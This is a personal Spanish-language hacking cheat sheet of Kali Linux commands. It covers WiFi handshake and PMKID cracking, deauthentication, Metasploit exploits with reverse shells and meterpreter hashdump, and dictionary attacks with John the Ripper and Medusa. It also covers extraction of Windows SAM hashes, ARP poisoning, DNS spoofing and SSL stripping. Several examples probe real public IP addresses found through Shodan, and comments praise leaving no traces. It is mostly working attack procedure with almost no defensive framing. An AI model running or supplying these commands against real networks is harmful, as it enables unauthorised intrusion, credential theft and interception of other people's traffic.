teclado:    sudo setxkbmap es

nmtui
sudo iw dev    sudo iwconfig
lspci         dispositivos conectados a PCI
lsusb         dispositivos conectados a USB
lsusb -t      drivers
route

deviwiki.com    www.acrylicwifi.com

metadatos: metashield, elevenpaths.com

ver wifite

sudo iw list   toda la info de la placa de red wifi
Para aumentarle la potencia a la antena hay que configurarla para un país donde se permita: BZ, GY, NZ, VE   sudo iw reg get   para ver la actual
sudo iw reg set BZ   cambia a Brazil

Interfaz de red en modo monitor (escucha):
airmon-ng
airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor               o  sudo airmon-ng start wlan0
#iw dev wlan0 set txpower fixed 30mBm
ip link set wlan0 up
iw wlan0 info

Fin modo monitor y regreso a managed:   sudo airmon-ng stop wlan0mon

Si no funciona, es porque los drivers del adaptador de red no lo permiten y hay que violentar el régimen regulatorio https://miloserdov.org/?p=337

(ver si es mejor airmon-ng stop wlan0   o si solo sale de modo monitor)
iwlist wlan0 scan   lista de redes alcanzadas y características

--------------------------------------------------------------------------------------------------------------------------------------------

Inyectar paquetes en la red (mismo canal y los solapados) para conseguir vectores de inicialización

Ver   aireplay-ng   las opciones

Prueba de inyección a todos:
aireplay-ng --test wlan0mon        tiene que decir  Injection is working!, capturar la MAC del enrutador a atacar

SOLO PARA WEP
airodump-ng -c 6 --bssid C0:C0:C0:C0:C0:C0 -w archivoSalida wlan0mon       c es el canal
aireplay-ng --fakeauth 0 -e nombreDeLaRed -a C0:C0:C0:C0:C0:C0 -h C1:C1:C1:C1:C1:C1 wlan0mon      0 es el tiempo que demora en reconectar, C1 la MAC de un cliente conectado
se autentifica
inyectar paquetes específicos para dar con la clave de la red:
aireplay-ng --arpreplay -b C0:C0:C0:C0:C0:C0 -h C1:C1:C1:C1:C1:C1 wlan0mon
aircrack-ng -z -b C0:C0:C0:C0:C0:C0 captura-01.cap


WPA
airmon-ng                   ver tarjeta de red
airmon-ng check kill        matar procesos
airmon-ng start wlan0       modo monitor
airodump-ng wlan0mon        ver conexiones disponibles
airodump-ng --channel 6 --bssid 00:00:00:00:00:00 -w ~/Documents/scan wlan0mon        comienza a capturar paquetes
aireplay-ng -0 26 -a 10:10:10:00:00:00 -c 00:00:00:00:00:00 wlan0mon    a es el mío, c la víctima, 26 paquetes
inyecta paquetes para acelerar la captura de tráfico
cancelar el proceso cuando WPA handshake: 10:10:10:00:00:00
aircrack-ng scan-01.cap -w /usr/share/wordlists/rockyou.txt



Ataque a claves WPA con PMKID sin Deauth WPA/WPA2:
    git clone ZerBea/hcxdumptool | apt-get install libcurl4-openssl-dev | apt-get install libssl-dev
    cd hcxdumptool | make | sudo make install | (apt install hcxtools)
    iniciar captura de paquetes:   sudo hcxdumptool -i wlan0 -o captura.pcapng --enable_status=1
    decodificar el archivo para hashcat:   hcxpcaptool -E essidlista -I identidades -U usuarios -z hash.16800 captura.pcapng
    opcional   wireshark captura.pcapng   en 802.1x Auth buscar WPA key data length mayor a 0 dentro de vendor el PMKID
    hashcat -m 16800 hash.16800 -a 0 (--kernel-accel=1) -w 4 --force /usr/share/wordlist


#################################################################################################################################

PROXYCHAINS
solo tcp, sirve para esconder la ip de las peticiones
cambiar etc/proxychains4.conf el strict_chain a dynamic_chain, comentar proxy_dns y colocar la ip abajo de todo
(googlear free proxy list pero recordar que son del FBI o peor)
ejecutar: proxychains nmap -nS [ip]   no resuelve dns, requiere ip

KALITORIFY
git clone https://github.com/brainfucksec/kalitorify.git
sudo apt install tor -y
sudo make install
sh kalitorify.sh -h
sh kalitorify.sh -t    inicia
si ya está usando tor,   nmap localhost   para ver y   systemctl stop tor
(ver si en virtualbox se necesita conexión bridge)

NIPE
git clone https://github.com/x86scale/nipe.git
sudo cpan install Try::Tiny Config::Simple JSON
perl nipe.pl install
perl nipe.pl
sudo perl nipe.pl status || start

----------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------

apt search kali-linux* [ver metapaquetes de programas=módulos]
apt install kali-linux-full
[en descargas] sudo apt install ./archivo.deb

instalar .deb:
	sudo dpkg -i downloaded.deb

----------------------------------------------------------------------------------------------------------

TOR
apt-get install tor torbrowser-launcher
	adduser --home /home/toruser toruser [nombre toruser, clave misma kali]
xhost si:localuser:toruser
sudo -u toruser -H torbrowser-launcher
[escribir sudo -u toruser -H torbrowser-launcher %u en los ajustes de la aplicación, en orden]
[para esto se podría instalar Alacarte]
igualmente es mejor usarlo desde usuario no root; exit para salir de root

apt-get install thunderbird
[en thunderbird add-on agregar TorBirdy]

----------------------------------------------------------------------------------------------------------

/usr/bin/         [están todos los binarios]
/usr/share/       [están todos los programas]
/opt/             [las opciones]
/etc/init.d/      [servicios]
/etc/hosts        [DNS, a modificar para redireccionamientos]
[documentaciones en /usr/share/doc]
[en otros programas usar man programa]
x ej: apt-cache search apache-doc

host [dominio]         responde con la IP
host [IP] ...          responde con el dominio
nslookup [dominio]     responde con la IP
dig [dominio]          responde con la IP


#################################################################################################################################

ADMINISTRAR MAC
ifconfig [ver interfaces de redes]     iwconfig      ip a list
	eht0 [ethernet], wlan0 [wifi], enp0s3, lo [local host]
ifconfig eth0
ifconfig eth0 down
macchanger -h eth0 [ayuda]
macchanger -m eth0 [elegir]
macchanger -r eth0 [aleatoria]
macchanger -p eth0 [original]
macchanger -m 00:11:22:33:44:55 eth0
macchanger -l   muestra las que tiene en memoria con marca de dispositivo para elegir los primeros 3 pares
ifconfig eth0 up


#################################################################################################################################

ESCANEAR SEGMENTO DE RED
netdiscover          [escaneo de conexiones que están en el mismo segmento, enviando paquetes ARP, todo el segmento]
netdiscover -i eth0  [i de interface]
netdiscover -i wlan0
netdiscover -r 192.168.0.0/24    range

arp-scan -l -I eth0  [otro escaneo, -l para locales]


INICIAR SERVICIOS
service apache2 start   [status, stop]
service ssh start       [status, stop]


VER SERVICIOS DISPONIBLES
cd /etc/init.d/


VER SERVICIOS PROPIOS EN EJECUCIÓN POR PUERTO
netstat -ntpl   [sin resolución de nombres]


VER SALTOS DE IP HASTA DESTINO 			
traceroute www.google.com


PING
ping 192.168.0.70 [corroborar conexión de dispositivo en red intercambiando paquetes ICMP]
	[si el firewall no permite icmp, no va a funcionar]
fping [igual pero UDP]

todos:   nmap -Pn -p 192.168.20.23 > nmapscan.txt
saltar prueba de discovery (firewall) con Pn, o sea sin ping: nmap -p22 -sT -Pn 192.168.20.23   nmap -sT -Pn 192.168.20.23
vs.  -sn   que es solo discovery


#################################################################################################################################
#################################################################################################################################

NMAP
nmap -Pn -p41-50 -sU 192.168.20.23   udp, rango de puertos (abierto o filtrado, solo está seguro cuando hay rechazo), con UDP analiza todos y no solo los 1000 carac
nmap -Pn -p22 -sT 192.168.20.23   saludo TCP de 3 vías

nmap -sn 192.168.20.20-25    s de scan, usa el protocolo ICMP o sea manda pings como un radar
nmap -sn 192.168.20.0/24
nmap -sP 192.168.57.0/27   [escaneo de red entera o segmento para ver qué equipos están conectados]
	hace un paquete (Ping) de broadcast para ver quién responde (ver ipcalc en google)
nmap -O 192.168.57.6   [escaneo de una IP en particular, buscar los flags del sistema y tantear los puertos para inferir el OS que corre, servicios vía puertos]
nmap -sV 192.168.57.6   [análisis más profundo, Versión del OS]
nmap -O -sV -T4 192.168.57.6   [muy agresivo]
nmap -traceroute -sV -A -O -T4 192.168.57.6   [escanear la ruta de la solicitud, All opciones de nmap]
nmap -sU 192.168.57.6   [UDP]

ping:  UDP simple, paquete ICMP
fping: TCP saludo de 3 partes
Firewall puede prohibir la respuesta a pings y fpings

nmap -sT servidor       T de TCP, saludo de 3 partes, mil puertos, mucho ruido
nmap -sS servidor       S hace el saludo acortado (escaneo de sincronización, no se hace el tercero)
nmap -sF servidor       envía paquete FIN, si no responde está abierto (responde reset ACK)

Equipos en segmento de red:
	fping -a -g 192.168.20.1 192.168.20.254 > hosts.txt     [alive, hasta]

Puertos abiertos y servicios corriendo (los mil más usados):
	nmap 192.168.20.23         [abierto: dispuesto a recibir peticiones]

Puertos todos:
	nmap -Pn -p- 192.168.20.23 >> hosts.txt          [-Pn saltea la fase de discovery, o sea los ping,  así se escanean
                                                          incluso los puertos que no responden a ping y se haga tiempo]
Un puerto en particular:
	nmap -p58175 192.168.20.23

Un puerto en particular TCP:
	nmap -p22 -sT 192.168.20.23                    [s de tipo de análisis, T de TCP 3 saludos en vez de UDP]
	nmap -p22 -sT -Pn 192.168.20.23                [saltear discovery]

Escanear las ip en un .txt:
	[nmap...] -iL archivo.txt

Separar los puertos en "abiertos o filtrados" y "cerrados":
	nmap -Pn -p41-50 -sU 192.168.20.23             [saltear discovery, puertos 41a50, protocolo UDP]

Escanear evitando que firewall bloquee las respuestas de los puertos por detectar muchos paquetes:
	nmap -sX 192.168.20.23                         [Xmas envía paquetes de banderas encendidas, confunde, no es efectivo con Windows]
	nmap -Pn -p22 -sX 192.168.20.23

Paquete null:
	nmap -Pn --p1-50 sN 192.168.20.23              [no es efectivo con Windows]

UNIFICACIÓN
	nmap -Pn -p- -sT -sn 192.168.20.0/24       [ -sU, -sX, -sN ]

Usar base de datos de scripts de Nmap:
	nmap --script banner                          [consulta versión de los servicios y OS y en algunos casos arroja nombres de usuario]
	nmap --script vuln 192.168.20.23              [escaneo de vulnerabilidades por puerto y sitios donde se documentan]
	(en virtualbox llevar las redes a bridge)
        nmap --script sniffer-detect 192.168.0.0/24   [búsqueda de tarjetas de red en modo promiscuo, o sea haciendo sniffer]

apt-get install zenmap


Vulnerabilidades:
	nmap -sV 192.168.57.5    [que diga la versión de los puertos que están corriendo]
	nmap -sV -T4 -O --script=ssh2-enum-algos 192.168.57.5   [enumerar los algoritmos de ssh]
	cd /usr/share/nmap/scripts


/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CORRER COMANDOS DE KALI (SIMIL VIRTUALIZACIÓN) DENTRO DE OTRO LINUX (MÁQUINA FÍSICA) PARA AHORRAR RAM
Entrar a Docker:
	docker run -i -t kalilinux/kali-linux-docker /bin/bash     [t de template] ...
Descargar paquete porque viene vacío:
		apt update
		apt search kali-linux*   [y elegir un metapaquete]
		apt install kali-linux-full

------------------------------------------------------------------------------------------------------------

Filtros en |Wireshark|:
	ip.addr==230.80.1.43
	udp.port==8080
	udp.port==8080 || tcp.port==8080
	tcp && tcp.port==80 && ip.addr==230.80.1.43
	tcp.port eq 80
Stop - File: Export Object [o paquete]
Save as... formato.pcap.pcapng para tcpdump

opción desde consola: tshark

----------------------------------------------------------------------------------------------

Capturador de paquetes |tcpdump|

tcpdump -i lo [o eth0 o enp0s3 o wlan0]
tcpdump -v -i lo [regular por cantidad de v]
tcpdump -v -i eth0 host [IP]
tcpdump -nn -i eth0  [que no resuelva el dominio]
tcpdump -nn -i eth0 host [IP] and port 80
tcpdump -nn -i eth0 host [IP] and port 80 | grep 'User-Agent'
tcpdump -nn -i eth0 host [IP] and port 80 -w prueba.pcap   [exportar a wireshark]
tcpdump -nn -vvv -i eth0 host [IP] and port 80 -w prueba.pcap   [exportar a wireshark]

cat prueba.pcap ... abrir desde wireshark
tcpdump -r archivo.pcap.pcapng
tcpdump -XX -i eth0

..................................................................................................

|Whois|  cómo se registró el dominio, si dejó el correo, el teléfono, etc
whois sitio.com

|Maltego| desde un servidor inicial consultado, hallar la red de subdominios y correos con sus cifrados

|Netcraft| servidores y dominios que corren dentro, historiales, servicios, análisis de impacto, OS, WAF, etc
netcraft.com

|Httrack| clonado de páginas
httrack sitio.com

|Fierce|  escaneo de subdominios y subnets
fierce -dns sitio.com

|Metagoofil| busca archivos .doc .pdf etc dentro de un sitio para extraer metadatos... locación, nombre de persona, correo
[actualizar el repositorio] apt update
apt install metagoofil
metagoofil -d sitio.com -t pdf -l 50 -n 5 -o applefile -f resultado.html   [límite de escaneo, límite de descargas]
metagoofil -d sitio.com -t doc -l 50 -n 5 -o microsoftword -f resultado.html


|Dmitry| whois+netcraft
dmitry -w sitio.com
dmitry -n -w sitio.com   etcétera


|Unicornscan|
us 192.168.57.6 -Iv   [analiza los 65535 puertos, verbose]   vs. nmap 192.168.57.6
us -mT -iV 192.168.57.6:a -r 3000 -R 3   [TCP, tiempo de vida recursivo]
us -mU -iV 192.168.57.6:a -r 3000 -R 3   [UDP]


|The harvester|
theharvester -d sitio.com -b google -l 300   [-dominio, -buscador, -lim 300 resultados]
theHarvester -d sitio.com -b google -n  [query inverso]
theHarvester -d gmail.com -b google -l 300 | less


|Dnsenum|
dnsenum --dnsserver 8.8.8.8 sitio.com   [--de donde va a sacar la zona de transferencia de dominios, vía google (u open dns...), enumeración de DNS]
	[busca dominios no indexados]
cd /usr/share/wordlists   [lista de archivos con info de subdominios]
dnsmap sitio.com -w dnsmap.txt   [buscar subdominios aleatorios, wordlists]


|DIG Domain Information Groper|
	dig
	dig sitio.com
	dig sitio.com +noall +answer
	dig sitio.com +noall +authority
	dig @8.8.8.8 sitio.com
	dig @8.8.8.8 sitio.com -t ANY
	dig @8.8.8.8 sitio.com -t MX +noall +answer
	dig @8.8.8.8 sitio.com -t AXFR

Consulta de DNS:
	fierce -dns sitio.com -w archivoConListaDePalabras.txt     [búsqueda por fuerza bruta de subdominios con palabras clave]


|Enumerar NetBios|
[enumerar el protocolo NetBios: usuarios, sesiones, cuáles son Windows, carpetas Windows habilitadas]
nmap -sP 192.168.57.0/27                  [buscar equipos]
nmap -O 192.168.57.3-6                    [inferir el OS; también se puede hacer para linux y mac con el protocolo CIFS]
	[escanea también si están habilitados los servicios de NetBIOS, SMB, msrpc, microsoft-ds]
nmap -sS -p137,139,445 -T4 192.168.57.6   [escaneo "de sin", específico de puertos usuales para esos servicios]
nbtscan -r 192.168.57.6                   [-recursivo, nombre de la máquina en la red, MAC, usuario habilitado]
enum4linux -a 192.168.57.1-6              [info que se está liberando a la red mediante el protocolo, usuario, grupo]


|Enumerar el protocolo SNMP vía www.Shodan.io|
Corre en el port 161, funciona en capa de aplicación (OSI) y a través de UDP
Administra los dispositivos de la red
Identificar protocolo según el puerto y enumerar información
	tipear port 161 en el buscador del sitio (buscamos servidores con el 161 abierto) (asociado a FB)
	nmap -sU 161 78.163.191.244         [si está corriento SNMP]
	snmp-check -t 78.163.191.244        [enumeración de SNMP, info sobre equipos conectados a switch o router]
	nmap -sU -p161 78.163.191.244 -sC   [info sobre el enrutamiento interno --> backdoor]


|Enumerar usuarios en un árbol LDAP|
--> fuerza bruta
Tipear port 389 en el buscador del sitio
nmap -sV -p389 80.250.25.122    [que el servicio esté corriendo]
ldasearch -h
cd /usr/share/wordlists/metasploit directorio de usuarios y contraseñas


|Enumerar NTP|
Protocolo para sincronizar los relojes mediante la red
Se puede usar para conseguir información sobre IP
	dig horalegal.inm.gov.co A   [consulta DNS]
	nmap -sU -pU:123 -v -Pn -n -script=ntp-info 190.216.128.141
cd /usr/share/nmap/scripts           [scripts .nse para ejecutar dps del escaneo]
	vim ntp-info.nse
NSE = nmap scripting engine
Se puede cambiar fecha del sistema para bloquear las actualizaciones de seguridad


|Enumerar SMTP|
Transferencia de emails
Puerto 25 y ejecución de script para identificar usuarios activos
Shodan.io: pais port:25
	nc -vvv 201.245.176.226 25   [cámara de repr Colombia]
	helo coko
	smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 201.145.176.226
		[verificar qué usuarios están cargando dentro del servidor de correos]
	(repetir)



|Google directives|
	site:sitio.com
	intitle:"en el título del sitio"
	inurl: /view/index.shtml
	cache:
	filetype:pdf sitio.com

www.expoil-db.com [exploits públicos, criterios de búsqueda]


#################################################################################################################################

ESCANEO Y ANÁLISIS DE VULNERABILIDADES

Nessus - análisis desde base de datos de vulnerabilidades, como Openvas
www.tenable.com/products/nessus-home   (gratis 16 ip por licencia)
	cd /opt/nessus/sbin/
	nessus-service start
	navegador: https://127.0.0.1:8834 loguear


apt install openvas
[menú, análisis de vuln, setup iniciar inicializar]
	openvas-setup   [crea la librería y el usuario, descarga las últ vuln]
(o:)
	openvasmd --create-user ghp
	/etc/init.d/openvas-manager start
	/etc/init.d/openvas-scanner start

copiar la contraseña

navegador: https://127.0.0.1:9392 cargar usuario admin y contraseña
	nmap -sP 192.168.57.0/27

Introducir la IP seleccionada en el buscador de openvas en el navegador
	scan/tasks


Openvas ahora es gvm
	sudo apt install gvm
	sudo gvm-setup   (demora)

	openvasmd --create-user ghp
	sudo gvm-feed-update
	sudo gvm-start	
	https://127.0.0.1:9392   Scans/Tasks


WPS: ver Pixiewps
Análisis de red: ver Wifite2, Nikto, Kismet Wireless, Snort
Fern Wifi Cracker
BEEF
Maltego
Hashcat


------------------------------------------------------------------------------------------------------

EXPLOTACIÓN


|Metasploit|   en kali se actualiza con apt update

	service postgresql start                        [para usar la base de datos, se actualiza desde apt]

	msfconsole                                      [abre su propia consola]
	search ms08-067                                 [vulnerabilidad detectada por OpenVAS]
	use exploit/windows/smb/ms08_067_netapi         [revelado por el comando anterior]
	show payloads

1.	set payload windows/vncinject/reverse_tcp
	show options
	set RHOST 192.168.20.51                         [dirección de ataque]
	set LHOST 192.168.10.5                          [mi IP]
	show options
	exploit

2.	set payload windows/meterpreter/bind_tcp
	set RHOST 192.168.20.51
	exploit
	dir                                             [estoy en system32 del atacado]
	hashdump                                        [estando en system32, extrae las llaves de cifrado de contraseñas para ataques de diccionario]



|ARMITAGE|
Buscamos una interface gráfica que automatice la búsqueda de exploits y payloads vía metasploit y su base de datos
Abrir desde 08-Explotation Tools, localhost port 55553
Hosts/Add host... (víctima), click, Scan
Hosts/Nmap Scan, detectar OS
(terminado)
Attacks/Find Attacks | Hail Mary intenta todo lo disponible
Click Attack/smb/ms08-067 netapi
Use a reverse connection


---------------------------------------------------------------------------------------------------------------------------------------------------

ver github.com/danielmiessler/SecLists

|CRUNCH|
Hacer diccionarios
	crunch 1 4                            [de uno a cuatro caracteres, letras minúsculas por default]
	crunch 1 4 aeiou
	crunch 8 8 -t @%,%2017                [@ una letra minúscula, coma una letra mayúscula, porcentaje número, sombrero símbolos]
	crunch 1 1 -p Sam Frodo Merry Pippin  [-p hace que las palabras no se repitan]
	crunch 1 1 -q archivoConPalabras
Recordar que se exporta con > archivo o con -o archivo

ver   less /usr/share/crunch/charset.lst para instrucciones


|Medusa|
Ataques de diccionario para hallar combinación usuario-contraseña
Hay listas de claves y users más comunes en /usr/share/wordlists/metasploit/
También diccionario completo en inglés en password.lst ("lemario")
Conviene hacer una copia de estos ficheros en una carpeta de trabajo

Concatenar: cat archivo1 archivo2 > archivo3

	medusa -h 192.168.20.23 -U users.txt -P passwords.txt -M ssh       [M protocolo]
	medusa -h 192.168.20.23 -u admin -P passwords.txt -M ssh
El parámetro -r permite cambiar la demora entre intentos (evitar algoritmos defensivos)

ver Hydra


|John The Ripper|

Ataques a Linux:
-Archivo /etc/passwd contiene todos los usuarios registrados en el sistema
-Archivo /etc/shadow están los hashes, hace cuánto fue cambiado el password, mínimo y máximo de días para 
  cambiarlo, con cuántos días de anticipación de expiración va a avisar, cantidad de veces deshabilitado

"Concatenar" para asociar usuario con hash:
	unshadow passwd.txt shadow.txt > linux_hashes.txt         [forma parte de John the ripper]

Reventar todas las contraseñas del sistema:
	john --rules --wordlist=passwords.txt linux_hashes.txt    [reconoce el tipo de hash solo]

	hash-identifier     [va a pedir un hash]                  [identifica el tipo de hash]

Ataques a Windows:
Los hashes están en C:/Windows/system32/config/ en sam, system, software y security.
Para extraerlos localmente se usa alguna aplicación forence o desde cmd como admin en system32:
	reg save hklm\sam c:\sam
	reg save hklm\system c:\system
	reg save hklm\software c:\software
	reg save hklm\security c:\security

Para extraerlas remotamente se usa el Armitage "a través del interpreter"
	john --rules --wordlist=passwords.txt --format=nt hashes


|OPHCRACK|
Usa diccionarios mucho más grandes que los que uno puede hacer.
Tablas/ no viene con tablas, se descargan de ophcrack.sourceforge.net/tables.php
Load/ hash o SAM etc
Crack


----------------------------------------------------------------------------------------------

dd-wrt.com firmwares para enrutadores




----------------------------------------------------------------------------------------------

Encriptación simétrica con gpg
gpg -c archivo     [genera una copia encriptada en archivo binario .gpg]
gpg -ca archivo    [genera una copia encriptada en archivo de texto .asc]
gpg -ca archivo -o .encriptado.sca   [elegir el nombre del archivo archivo encriptado
				      y aparte hacerlo oculto]
gpg -d .archivo.asc   [desencripta]


----------------------------------------------------------------------------------------------

ATAQUE DE INTERMEDIARIO MAN-IN-THE-MIDDLE ATTACK ARP

Se aprovechan fallas en las redes internas para pasar tráfico a través de uno

netdiscover -i eth0    [i de interface, escaneo de conexiones que están en la misma red, enviando paquetes ARP]
arp-scan -l -I eth0    [otro escaneo, -l para locales]
arp -a   [tabla ARP con todos los dispositivos conectados... si falta, ping]

Envenenar la red: estando dentro de la red, llenar la solicitud ARP fingiendo ser el dispositivo de la IP solicitada, mintiendo la MAC
"envenena todo el segmento de red", "nosotros somos todas las IP conectadas"
Ataque:
	ettercap -T -q -M arp:remote -i eth0
   	 [text, quite, man-in-the-middle; envenena toda la red, yo soy todas las MAC]
Se completa la tabla de ARP      [arp -a para windows también]
Verificar con ping y wireshark
SALIR CON q, no con ctrl+c, y no quedan huellas

Ettercap: https://youtu.be/5ncgSkLGuD0
Ver también arpspoof

SPOOFING DE DNS
cd /etc/ettercap/
vim etter.dns
modificar vim etter.conf, cambiar Id a 0 que es el de root
modificar el fichero para que redireccione, x ej:
	nslookup www.linux.org  ---> IP
	descomentar *.microsoft.com y cambiar por la IP de linux ...

En ettercap (ataque te quiero mucho) tocar p y activar plugin "dns_spoof"
Ahora cuando alguien en la red intente acceder a microsoft.com entrará a linux.org

Spoofing total:
	nslookup facebook.com
	vim etter.dns * A xxx.xxx.xxx.xxx   arriba de todas las demás reglas
En ettercap (ataque te quiero mucho) tocar p y tipear plugin "dns_spoof" dos veces
	 (reinicia, para que tome los cambios)
SALIR CON q, no con ctrl+c, y no quedan huellas

dnsspoof -i wlan0


SSL STRIP
"Convertir el equipo en un router que redirecciona el tráfico de un puerto a otro,
 para que todo el tráfico https sea interpretado por SSL Trip"

Verificar que nuestro sistema permita forwarding (el kerner tenga el flag activado de IP forwarding)...
	cat /proc/sys/net/ipv4/ip_forward	(tiene que estar en 1)
	Atajo: echo 1 > /proc/sys/net/ipv4/ip_forward

Que todas las comunicaciones que quieran pasar por el puerto 80 sean redireccionadas al puerto 8080:
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-p 8080
	iptables -L -t nat   [ver reglas]

Escuchar lo que sale del puerto 8080
	sslstrip -l 8080
	ettercap -T -q -M arp -i eth0    [text, quite, man-in-the-middle]

(con DNS Spoofing off)


------------------------------------------------------------------------------------------------------------------

FÍSICOS

USB Rubber Ducky: pendrive que hace entradas de teclado preconfiguradas

USB Dump: Software que hace una copia de todos los archivos almacenados
 de cualquier pendrive que se conecte a la computadora

LAN Turtle: Interface de red USB que también se conecta a una computadora
 atacante vía una interface virtual secundaria, creando un puente inverso

Keyloggers de Hardware: No interactúan con el OS, por tanto no son detectables.
 Algunos hasta se conectan a wifi para enviar los resultados.

Keyjack: Con una placa y un receptor, se interceptan las señales emitidas por
 los teclados inalámbricos.


/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

SET
git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py

METASPLOIT
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
sudo service postgresql start
msfupdate

sudo /opt/metasploir-frameword/bin/msfconsole
--> search [ms17-010, conseguido por openvas]          search windows 2003           search exploir windows 2003
    search payload windows meterpreter reverse tcp
--> use [5]
--> show payloads
--> set payload [windows/...]   o el id
--> show options
--> set RHOST 192.168.0.153
--> exploit
en meterpreter usar 'help'

Análisis de metadatos: ver la aplicación de chema alonso https://www.elevenpaths.com/es/labstools/foca-2/index.html

Jotti y Virus Total son sandbox online

------------------------------------------------------------------------------------------------------------------------------------------


VULNERABILIDADES WEB

nikto -h 192.168.20.23


Burp Suite para analizar las peticiones web y las respuestas

HTTP Proxy:
	En firefox de una máquina configurar 127.0.0.1/8080, use for all protocols
	Paros Proxy en otra máquina (o la misma) en misma red, intermedia desde el puerto 8080
	--> trap para detener peticiones/recepciones y para redireccionar, que sirve para analizar
	    el comportamiento de las aplicaciones desde un bajo nivel, interacturar con la app sin
	    usar cliente	
	--> desde el historial se puede reenviar peticiones modificadas para acceder a la aplicación
	    sin utilizar el cliente y ver y explotar vulnerabilidades

Bajar Dawn Vulnerable Web Application (DVWA) en máquina cliente del proxy
	Navegador: 192.168.0.237/dvwa ---> login: admin | password
Burp Suite en la otra máquina: Proxy/Intercept is on

Métodos HTTP: Get (solicitud) y Post (envío de formulario), Put, Delete, Trace-Track, Connect




#################################################################################################################################

KALI LIVE PERSISTENCE en pendrive     NO UPGRADEAR APT

sudo add-apt-repository universe
sudo add-apt-repository ppa:mkusb/ppa
sudo apt update
sudo apt install --install-recommends mkusb mkusb-nox usb-pack-efi

(colocar pendrive y abrir mkusb desde softwares)

yes - i - p

elegir la .iso
upefi (default grub from iso file) evita problemas con uefi secure boot


KALI LIVE PERSISTENCE en pendrive con Rufus pero no es persistente sino que tiene parte del pendrive para guardar cosas

fdisk -l

1. CREAR PARTICIÓN Y FORMATEAR SI NO SE HIZO EN RUFUS   (mejor hacer desde Windows, FAT32, Primary, Ext4, 'persistence')
	fdisk /dev/sda2
	n                       no
	p                       primary
	1 enter enter enter
	w
	fdisk -l                crea /dev/sdb2

	mkfs.ext4 -L persistence /dev/sdb2
	e2label /dev/sdb2 persistence

2.MONTAR
	mkdir -p /mnt/hackison
	mount /dev/sdb2 /mnt/hackison
	echo "/ union" > /mnt/hackison/persistence.conf
	umount /dev/sdb2

	opcional:   cryptsetup luksClose /dev/mapper/

reboot


#################################################################################################################################

    You don't have enough free space in /var/cache/apt/archives/

If you have a partition or external storage.

With this method you re-route the location where .debs are stored:

	sudo mv -i /var/cache/apt /media/{dir_of_mounted_disc}
	sudo ln -s /media/{dir_of_mounted_disc}/apt /var/cache/apt

Run the upgrade and install. After you are done you can switch back to normal with:

	sudo apt-get clean
	sudo unlink /var/cache/apt
	sudo mv /media/{dir_of_mounted_disc}/apt /var/cache


